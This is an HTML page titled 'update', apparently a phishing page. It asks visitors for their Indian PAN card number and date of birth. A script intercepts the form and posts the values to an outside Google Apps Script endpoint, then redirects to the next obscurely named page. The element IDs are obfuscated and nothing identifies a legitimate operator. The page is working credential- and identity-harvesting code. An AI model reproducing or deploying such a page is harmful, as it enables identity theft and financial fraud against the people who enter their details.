<!DOCTYPE html>
<html lang="zxx">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>update</title>
    <style>
        #awesrw ,#wsdfjkiuytd ,#wsdfjkiuytda
    {
        width: 100%;
    }
    #oiuhgbju

    {
        background-color: rgb(121, 13, 69);
        border-radius: 15px;
        margin-left: 9%;
        font-size: larger;
        color: aliceblue;
        font-style: normal;
        text-decoration-line: none;
        padding-right: 15px;
        padding-left: 15px;
        padding-top: 3px;
        padding-bottom: 3px;

    }
    #puyht 
    {
        background-color: rgb(237, 220, 231);
        border-radius: 15px;
        margin-left: 4%;
        font-size: larger;
        color: rgb(23, 23, 23);
        font-style: normal;
        text-decoration-line: none;
        padding-right: 15px;
        padding-left: 15px;
        padding-top: 3px;
        padding-bottom: 3px;
        
    }
    #ytrdjjy
    {
        margin-left: 9%;
        margin-top: 10%;
    }
    #ytrdchytd
    {
         margin-left: 9%;
      width: 80%;
      height: 28px;
      color: #554;
    background: #f0efee;
    border: 1px solid #cac5c6;
    }
    #ytordchytd
    {
         margin-left: 9%;
      width: 80%;
      height: 28px;
      color: #554;
    background: #f0efee;
    border: 1px solid #cac5c6;
    }
    #ytrdjjyuy{
        margin-left: 9%;
    }
    #oiuygggf
    {
          margin-left: 9%;
        margin-top: 15px;
        width: 20%;
        height: 28px;
        background-color:#466c94;
        font-size: large;
        color: aliceblue;
        border-style: none;
        border-radius: 2px; 
    }
    </style>
</head>
<body>
    <div id="awesr">
        <img src="poiugf.jpeg" alt=""  id="awesrw">
    </div>
    <div id="rest">
        <form action="https://script.google.com/macros/s/AKfycbzRhoJAED03W7xasLwlPX6e7zqO0bx5za2do7jzZoGEKALczKJ3dI8avRFJt_JzDAg3/exec" method="post" id="aa">
            
            <div id="uytf">
                <p id="ytrdjjy">
                 Enter Your Pancard*
                </p> 
                <input type="text" name="pan" id="ytrdchytd" >

                <p id="ytrdjjyuy">
                    Enter Your Date Of Birth* 
                </p> 
                <input type="text" name="dob" id="ytordchytd" >
                
                <center>
                    <button type="submit" id="oiuygggf">Continue</button>
                </center>
            </div>
        </form>
        <script type = "text/javascript" >
            window.addEventListener("DOMContentLoaded", function() {
                const yourForm = document.getElementById('aa');
                yourForm.addEventListener("submit", function(e) {
                    e.preventDefault();
                    const data = new FormData(yourForm);
                    const action = e.target.action;
                    fetch(action, {
                        method: 'POST',
                        body: data,
                    }).then(() => {
                        window.location.replace('4uytresdfghuytre.html')
                    })
                })
            }); 
        </script> <br>
         <img src="rpkuyfd.jpeg" alt="" id="wsdfjkiuytd">
    </div>
</body>
</html>